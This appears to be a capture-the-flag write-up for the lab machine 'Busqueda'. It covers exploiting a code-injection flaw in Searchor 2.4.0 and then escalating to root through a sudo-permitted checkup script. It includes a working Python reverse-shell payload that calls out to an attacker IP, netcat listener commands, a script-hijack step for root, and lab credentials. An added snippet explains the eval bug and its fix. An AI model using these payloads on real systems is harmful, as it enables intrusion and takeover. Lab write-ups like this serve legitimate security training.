I tried to browse to http://busqueda.htb but was redirected to http://searcher.htb.
You need to add it to your hosts file.
nmap
rustscan -a busqueda.htb
Output:
PORT STATE SERVICE REASON
webpage


This is the request for this page:
Wappalyzer
Flask is interesting: it's a Python server.
It's also using Werkzeug/2.1.2.
It's also using Searchor 2.4.0.
https://github.com/ArjunSharda/Searchor
This module is vulnerable:
https://security.snyk.io/package/pip/searchor
I can't find any PoC, so I need to do it myself; let's see the change.
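The Searchor bug is a string-formatted eval: the engine name and the query are pasted into Python source text and evaluated. The snippet below is an added example of mine, not Searchor's code or anything from this page, that reproduces that pattern with two stand-in engines and shows the fix (resolve the engine by name lookup, pass the query as a plain argument) so that a `', ...)#` style query stays data. The engine names and URL templates are assumptions.

```python
from enum import Enum
from urllib.parse import quote_plus


class Engine(Enum):
    """Two stand-in engines; assumed for the demo, not Searchor's real list."""
    Accuweather = "https://www.accuweather.com/en/search-locations?query={q}"
    Google = "https://www.google.com/search?q={q}"

    def search(self, query: str) -> str:
        # The query is URL-encoded, so it only ever reaches the URL as data.
        return self.value.format(q=quote_plus(query))


def build_url_vulnerable(engine: str, query: str) -> str:
    # The bug class: user input is spliced into source text and eval'd.
    # Anything after a closing quote in `query` is parsed as Python.
    return eval(f"Engine.{engine}.search('{query}')")


def build_url_fixed(engine: str, query: str) -> str:
    # Resolve the engine by name lookup instead of eval; unknown names raise.
    try:
        selected = Engine[engine]
    except KeyError:
        raise ValueError(f"unknown engine: {engine!r}") from None
    # The query is passed as an ordinary string argument, so quotes, commas
    # or '#' inside it cannot change what code runs.
    return selected.search(query)


def rejects_unknown_engine(name: str) -> bool:
    # True when the fixed builder refuses an engine name that is not a member.
    try:
        build_url_fixed(name, "anything")
    except ValueError:
        return True
    return False


# Constructed probe: harmless Python inside the quotes. The vulnerable
# builder evaluates it (search text becomes "42"); the fixed one encodes it.
PROBE = "' + str(6 * 7) + '"


def demo() -> dict:
    return {
        "vulnerable": build_url_vulnerable("Accuweather", PROBE),
        "fixed": build_url_fixed("Accuweather", PROBE),
    }


if __name__ == "__main__":
    for kind, url in demo().items():
        print(f"{kind}: {url}")
```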
RCE
https://medium.com/@bdemir/a-pentesters-guide-to-code-injection-dcfa774a4431
Listen first:
nc -lnvp 4949
Payload:
engine=Accuweather&query=', exec("import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.10.14.58',4949));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['/bin/sh','-i']);"))#

python3 -c 'import pty;pty.spawn("/bin/bash")'
ctrl+z
stty raw -echo; fg # allow auto completion
Enum
cd /home/svc
Output:
[user]
We have a user: cody
Let's search /var/www/app for interesting files.
.git is interesting, and this is what we can find:
Don't forget to put gitea.searcher.htb in the /etc/hosts file.
This is the password of the user svc: jh1usoih2bkjaspwe92
sudo -l
With the password we can use sudo:
sudo -l
Output:
User svc may run the following commands on busqueda:

sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-ps
Output:
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
Docker-inspect
https://buildvirtual.net/how-to-use-docker-inspect/
sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-inspect --format='{{ .Config }}' f84a6b33fb5a
Output:
--format={f84a6b33fb5a false false false map[3306/tcp:{} 33060/tcp:{}] false false false [MYSQL_ROOT_PASSWORD=jI86kGUuj87guWr3RyF MYSQL_USER=gitea MYSQL_PASSWORD=yuiu1hoiu4i5ho1uh MYSQL_DATABASE=gitea PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin GOSU_VERSION=1.14 MYSQL_MAJOR=8.0 MYSQL_VERSION=8.0.31-1.el8 MYSQL_SHELL_VERSION=8.0.31-1.el8] [mysqld] <nil> false mysql:8 map[/var/lib/mysql:{}] [docker-entrypoint.sh] false [] map[com.docker.compose.config-hash:1b3f25a702c351e42b82c1867f5761829ada67262ed4ab55276e50538c54792b com.docker.compose.container-number:1 com.docker.compose.oneoff:False com.docker.compose.project:docker com.docker.compose.project.config_files:docker-compose.yml com.docker.compose.project.working_dir:/root/scripts/docker com.docker.compose.service:db com.docker.compose.version:1.29.2] <nil> []}
Mysql root password: jI86kGUuj87guWr3RyF
Mysql user: gitea
Mysql gitea password: yuiu1hoiu4i5ho1uh
GOSU_VERSION=1.14
gitea

You can log in as the user cody via this link:
http://cody:[email protected]/cody/Searcher_site.git
You need to add gitea.searcher.htb to the hosts file.
There are 2 users.

I'm logged in as administrator with the password we found previously.
Mysql gitea password: yuiu1hoiu4i5ho1uh
There are a few scripts.
In the script system-checkup.py:
Exploit
We can replace full-checkup.sh with our own script; we just need to create it in another directory.
In the file /home/svc/.peanut/full-checkup.sh I place the reverse shell:
Now listen with netcat:
nc -nlvp <Port>
And start the script:
sudo -S /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup